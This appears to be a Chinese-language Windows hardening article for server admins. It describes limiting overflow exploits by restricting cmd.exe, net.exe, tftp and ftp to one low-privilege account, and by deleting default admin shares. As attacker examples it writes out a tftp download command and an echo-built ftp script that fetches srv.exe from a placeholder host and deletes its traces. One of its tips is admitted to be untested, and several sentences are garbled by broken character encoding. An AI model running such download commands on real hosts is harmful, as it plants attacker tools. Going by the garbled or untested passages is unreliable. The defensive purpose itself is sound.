我相信但凡有接觸黑客或者安全這方面的朋友，都一定有接觸過溢出攻擊或接觸過這一類詞，也就是有了溢出攻擊，以及高手們所發(fā)布的溢出程序，才有了那么多的“快餐黑客”。

　　無可否認(rèn)，溢出攻擊無論是對(duì)黑客，或者安全檢測(cè)人員來說，都是對(duì)一臺(tái)主機(jī)測(cè)試的時(shí)候所會(huì)采取的手段，因?yàn)橐绯龉羧绻晒Φ脑挘梢粤钗覀冄杆佾@取對(duì)方主機(jī)的一定權(quán)限。

　　但是，我們利用溢出就開心，但是網(wǎng)管呢，他可就慘了，尤其是一臺(tái)專門用來保護(hù)重要數(shù)據(jù)的主機(jī)如果給一些無良黑客，或應(yīng)該說是駭客吧，他們?nèi)肭趾螅罅縿h除數(shù)據(jù)，無論你有沒有備份數(shù)據(jù)，損失都是十分嚴(yán)重的，所以有效地打補(bǔ)丁倒也是一個(gè)好方法，但是，有時(shí)候你忘記了呢?或者不知道呢，又或者對(duì)方用的是0day Exploit呢!所以打補(bǔ)丁是有效，但不是唯一的方法。

　　但是我卻在看某安全雜志的時(shí)候，有一個(gè)牛人說到給cmd.exe設(shè)置權(quán)限，可以有效地防止溢出，再加上我和一些高手交流的時(shí)候，說到這個(gè)，他們也說理論上可以行得通，但是他們卻叫我試試。-_-#

　　好了，不再廢話了，下面說說怎么防止溢出。各位網(wǎng)管可要看仔細(xì)啦!

　　首先，我們可以建立一個(gè)用戶，名字就叫CmdUser,密碼就設(shè)置強(qiáng)壯一點(diǎn)，而且如果你追求完美的話，可以在用戶的名稱前面加上一個(gè)$.按照網(wǎng)上所公布的方法，建立一個(gè)隱藏帳戶，這樣，就算給人入侵了，也不會(huì)使用net user cmduser passworld 來修改這個(gè)用戶的密碼。記住哦，那個(gè)用戶必須是user等級(jí)的哦!

　　建立了用戶后，來到c:\winnt\system32,(這里系統(tǒng)安裝在C盤).找到cmd.exe,用右鍵打開屬性，在安全那里，如圖一所示

　　我們所要做的就是把所有的用戶刪除，然后添加CmdUser這個(gè)用戶，完成后就確定就可以了，但是不要以為這樣就可以了哦，還要找到net.exe這個(gè)按照cmd.exe的方法來設(shè)置，估計(jì)大家找到了net.exe的時(shí)候，發(fā)現(xiàn)旁邊還有一個(gè)net1.exe,這個(gè)也要設(shè)置哦，設(shè)置好了，不要以為松了一口氣，其實(shí)這樣雖然可以對(duì)付一些菜鳥黑客，但是，如果對(duì)方是老鳥來的話，他可以通過tftp，或者ftp等等來傳輸一個(gè)本地溢出的溢出程序，我們就game over了，或者他上傳一個(gè)木馬，利用替換服務(wù)這個(gè)方法呢，這個(gè)倒也是令人防不勝防啊

可能讀者就要問了，你既然提出來，是不是有方法解決啊，不錯(cuò)!也算是一點(diǎn)點(diǎn)方法啦，下面就先說說tftp的方法，這個(gè)很簡單的，進(jìn)入C:\WINNT\system32\drivers\etc，用記事本打開services這個(gè)文件，如圖2所示

　　把tftp這個(gè)端口修改為0.。這樣，入侵著就不會(huì)通過使用tftp –I Host get files.exe文件來達(dá)到傳輸自己的工具。當(dāng)然，為了更好的安全性，我們可以通過搜索tftp.exe這個(gè)文件，然后把tftp這個(gè)執(zhí)行文件按照cmd。exe那樣，添加成為只有cmduser這個(gè)用戶才可以使用。下面就再說說另外一個(gè)方法。

　　我相信，大家應(yīng)該還記得一個(gè)使用echo命令來利用ftp來下載東西的命令吧，什么?你不知道?我來說一下：

　　echo open xxx.xxx.xxx.xxx >ftp.txt
　　echo user >>ftp.txt
　　echo password >>ftp.txt
　　echo get srv.exe >>ftp.txt
　　echo bye >>ftp.txt
　　
　　ftp -s:ftp.txt
　　del ftp.txt

　　這樣就可以把srv.exe這個(gè)軟件下載了，我們也可以按照cmd的方法，通過把ftp的使用權(quán)限分配給cmduser，這樣的話，就可以避免給對(duì)方上傳軟件了，其實(shí)還是有很多方法可以上傳的，但是我還是留下了一些思路給讀者，因?yàn)椋挥羞@樣，我們才可以提高自己的技術(shù)。另外呢，可能有些朋友可能會(huì)利用以下這么一個(gè)腳本來關(guān)閉ipc$默認(rèn)共享：

　　@echo off
　　net share c$ /del
　　net share d$ /del
　　net share e$ /del
　　net share f$ /del
　　net share ipc$ /del
　　net share admin$ /del
　　@cls

　　但是我們這樣設(shè)置的話，可能會(huì)令到他們覺得很麻煩，所以，我們是不是可以在最后面那里加上一個(gè) net start explorer ,然后做成開機(jī)腳本，這樣可能會(huì)好一點(diǎn)哦，為什么說可能呢?因?yàn)槲矣捎跁r(shí)間關(guān)系，所以沒有來得及試驗(yàn)，希望試驗(yàn)成功的朋友到論壇發(fā)表一下你的看法!

　　下次有機(jī)會(huì)的話，我可能還說說怎么防止sql injection.。如果試驗(yàn)的過程中還是有什么疑問的話，歡迎e-mail to :ytt@hackbase.net

最新評(píng)論